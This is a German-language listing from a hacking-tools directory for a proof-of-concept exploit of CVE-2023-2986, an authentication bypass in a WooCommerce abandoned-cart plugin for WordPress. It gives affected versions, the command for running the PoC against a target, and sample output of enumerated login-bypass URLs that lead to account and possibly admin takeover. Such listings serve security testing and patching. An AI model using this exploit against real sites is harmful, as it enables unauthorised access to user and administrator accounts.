Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-2986 — Proof of Concept für die Schwachstelle CVE-2023-2986 im Plugin 'Abandoned Cart Lite for WooCommerce' für WordPress | Kitploit
Tools/GitHubGitHub/ayantaker/cve-2023-2986
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubayantaker/cve-2023-2986

CVE-2023-2986

Proof of Concept für die Schwachstelle CVE-2023-2986 im Plugin 'Abandoned Cart Lite for WooCommerce' für WordPress

Repository anzeigen
63vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Original Proof of Concept für CVE-2023-2986

Proof of Concept für die Schwachstelle CVE-2023-2986 im Plugin 'Abandoned Cart Lite for WooCommerce' in WordPress

Verwandte Details

  • NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • Verwundbare Versionen : version <= 5.14.2 version <= 5.15.1
  • Gepatchte Version : 5.15.0 5.15.2

Update

  • Es wurde angenommen, dass Version 5.15.0 das Problem behebt, aber ich habe festgestellt, dass es nicht vollständig behoben wurde und das Gleiche aktualisiert wurde. Die tatsächliche gepatchte Version ist also 5.15.2

Schwachstellenanalyse

  • Keysight Blogs : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

Verwendung

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

Durch Eingabe der URL im Browser erhalten Sie Zugriff auf das jeweilige Benutzerkonto. Wenn der WordPress-Admin-Benutzer selbst einen Eintrag hat, führt dies zu Zugriff auf die Admin-Konsole und damit zur vollständigen Kompromittierung des WordPress-Servers.

Haftungsausschluss

Dieses Proof of Concept (POC) wurde ausschließlich für akademische Forschungszwecke und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Der Autor übernimmt keine Verantwortung oder Haftung für einen Missbrauch des POC. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen